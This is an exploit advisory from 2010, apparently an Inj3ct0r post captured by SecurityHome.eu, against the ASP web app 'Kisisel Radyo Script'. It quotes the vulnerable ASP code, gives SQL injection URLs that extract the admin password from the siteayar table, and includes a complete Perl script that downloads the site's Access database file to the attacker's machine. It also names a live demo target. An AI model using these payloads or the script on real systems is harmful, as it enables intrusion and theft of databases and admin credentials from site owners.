[webapps / 0day] - Kisisel Radyo Script - Multiple

[webapps / 0day] - Kisisel Radyo Script - Multiple Vulnerabi
http://www.securityhome.eu/exploits/exploit.php?eid=8925157864cbb8036394159.83639048
[webapps / 0day] - Kisisel Radyo Script - Multiple Vuln...
Article URL
exploit.php?eid=8925157864cbb8036394159.83639048
Author
SecurityHome.eu
Published: 17 October 2010
<!DOCTYPE
html
PUBLIC
'-//W3C//DTD
XHTML
1.0
Strict//EN'
'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html
xmlns='http://www.w3.org/1999/xhtml'><head><meta
http-equiv='Content-Type'
content='text/html;
charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Kisisel Radyo Script - Multiple
Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description'
content='Kisisel Radyo Script - Multiple Vulnerabilities by FuRty in webapps / 0day | Inj3ct0r - exploit
database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'
/><link
rel='alternate'
type='application/rss+xml'
title='Inj3ct0r
RSS'
href='/rss'
/><script
type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." :
"http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js'
type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker =
_gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(tr
ue);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================
=========================
Kisisel Radyo Script - Multiple Vulnerabilities
===============================================
############################################
Author: FuRty
Contact : [email protected]
Thanks: RedGuard, KnocKout, TrSniper and all Justic3 Group
############################################
Script : Kisisel Radyo Script
Version : N/A
Download : http://www.aspindir.com
###########################################
SQL Injection Vulnerable in radyo.asp
####################################
id = Request.QueryString(&quot;id&quot;)
Set baglanti = Server.CreateObject(&quot;Adodb.Connection&quot;)
baglanti.Open &quot;Provider=Microsoft.Jet.Oledb.4.0;Data
Server.MapPath(&quot;&quot;&amp;veriyolu&amp;&quot;&quot;)
Page 1/3
Source=&quot;
&amp;
[webapps / 0day] - Kisisel Radyo Script - Multiple Vulnerabi
http://www.securityhome.eu/exploits/exploit.php?eid=8925157864cbb8036394159.83639048
set rsust=Server.CreateObject(&quot;ADODB.RecordSet&quot;)
sql = &quot;Select * from sayfa WHERE id=&quot;&amp;id&amp;&quot;&quot;
############################################
http://VICTIM/path/radyo.asp?Id=2 and 1=1 [True]
http://VICTIM/path/radyo.asp?Id=2 and 1=0 [False]
http://VICTIM/path/radyo.asp?Id=2%20union%20select%200,1,adminsifre%20from%20siteayar%20where%
20id=1
##############################################
Remote Database Disclosure Exploit
##############################################
#!/usr/bin/perl -w
#
# Kisisel Radyo Script Remote Database Disclosure Exploit
# Coded: FuRty
# Thanks: RedGuard, KnocKout, TrSniper and all Justic3 Group
# Contact : [email protected]
# Demo: http://www.kardeslermarble.com/radyo/
use LWP::Simple;
use LWP::UserAgent;
system(&#039;cls&#039;);
system(&#039;title Kisisel Radyo Script Remote Database Disclosure Exploit by FuRty&#039;);
system(&#039;color 4&#039;);
if(@ARGV &lt; 2)
{
print &quot;[-]Ornegi inceleyin
&quot;;
&amp;help; exit();
}
sub help()
{
print &quot;[+] usage1 : perl $0 site.com /path/
&quot;;
print &quot;[+] usage2 : perl $0 localhost /
&quot;;
}
print &quot;
************************************************************************
&quot;;
print &quot;* Kisisel Radyo Script Remote Database Disclosure Exploit
*
Page 2/3
[webapps / 0day] - Kisisel Radyo Script - Multiple Vulnerabi
http://www.securityhome.eu/exploits/exploit.php?eid=8925157864cbb8036394159.83639048
&quot;;
print &quot;* Exploited By : FuRty
*
&quot;;
print &quot;* msn : [email protected]
*
&quot;;
print &quot;* Thanks: RedGuard,KnocKout, TrSniper and All Justic3 Group
*
&quot;;
print &quot;*********************************************************************
&quot;;
($TargetIP, $path, $File,) = @ARGV;
$File=&quot;sevvo/eco23.mdb&quot;;
my $url = &quot;http://&quot; . $TargetIP . $path . $File;
print &quot;
wait!!!
&quot;;
my $useragent = LWP::UserAgent-&gt;new();
my $request = $useragent-&gt;get($url,&quot;:content_file&quot; =&gt; &quot;C:/db.mdb&quot;);
if ($request-&gt;is_success)
{
print &quot;[+] $url Exploited!
&quot;;
print &quot;[+] Database saved to C:/db.mdb
&quot;;
exit();
}
else
{
print &quot;[!] Exploiting $url Failed !
[!] &quot;.$request-&gt;status_line.&quot;
&quot;;
exit();
}
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-17]</pre></body></html>
Page 3/3